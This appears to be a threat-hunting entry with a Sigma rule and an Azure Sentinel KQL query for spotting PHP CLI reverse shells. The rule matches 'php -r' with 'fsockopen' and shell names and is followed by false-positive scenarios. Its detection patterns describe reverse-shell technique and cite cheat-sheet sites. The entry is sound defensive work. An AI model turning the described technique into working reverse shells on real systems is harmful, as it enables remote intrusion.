The hypothesis is that the detected PHP CLI usage may indicate an adversary establishing a reverse shell to exfiltrate data or execute commands remotely. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential command and control channels and mitigate advanced persistent threats.
Detection Rule
title: Potential PHP Reverse Shell
id: c6714a24-d7d5-4283-a36b-3ffd091d5f7e
status: test
description: |
Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets.
Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.
references:
- https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- https://www.revshells.com/
author: '@d4ns4n_'
date: 2023-04-07
tags:
- attack.execution
logsource:
category: process_creation
product: linux
detection:
selection:
Image|contains: '/php'
CommandLine|contains|all:
- ' -r '
- 'fsockopen'
CommandLine|contains:
- 'ash'
- 'bash'
- 'bsh'
- 'csh'
- 'ksh'
- 'pdksh'
- 'sh'
- 'tcsh'
- 'zsh'
condition: selection
falsepositives:
- Unknown
level: high
imProcessCreate
| where TargetProcessName contains "/php" and (TargetProcessCommandLine contains " -r " and TargetProcessCommandLine contains "fsockopen") and (TargetProcessCommandLine contains "ash" or TargetProcessCommandLine contains "bash" or TargetProcessCommandLine contains "bsh" or TargetProcessCommandLine contains "csh" or TargetProcessCommandLine contains "ksh" or TargetProcessCommandLine contains "pdksh" or TargetProcessCommandLine contains "sh" or TargetProcessCommandLine contains "tcsh" or TargetProcessCommandLine contains "zsh")Scenario: Scheduled PHP Cron Job
Description: A legitimate cron job runs a PHP script to perform routine maintenance or data processing.
Filter/Exclusion: Check for php -q in the command line and ensure the script path is in a known safe directory (e.g., /var/www/cron_jobs/).
Example: process_data.php in /var/www/cron_jobs/ with php -q /var/www/cron_jobs/process_data.php
Scenario: PHP CLI Used for Code Execution in DevOps Pipeline
Description: A CI/CD pipeline uses PHP CLI to run scripts for testing or deployment.
Filter/Exclusion: Filter commands that include known CI/CD tool names like git, npm, or docker, and check for execution in a pipeline directory (e.g., /opt/ci_pipeline/).
Example: php /opt/ci_pipeline/build_script.php triggered by a Jenkins or GitLab CI job
Scenario: Admin Task Using PHP CLI for System Monitoring
Description: An admin uses a PHP script to monitor system resources or logs.
Filter/Exclusion: Filter for known admin tools or scripts (e.g., monitor_system.php) and check for execution in a system admin directory (e.g., /opt/admin_tools/).
Example: php /opt/admin_tools/monitor_system.php run manually by an admin
Scenario: PHP CLI Used for Generating Reports
Description: A report generation script is run via PHP CLI to produce daily or weekly reports.
Filter/Exclusion: Filter for known report generation tools (e.g., generate_report.php) and check for execution in a reporting directory (e.g., /var/reports/).
Example: `php /var/reports/generate_report.php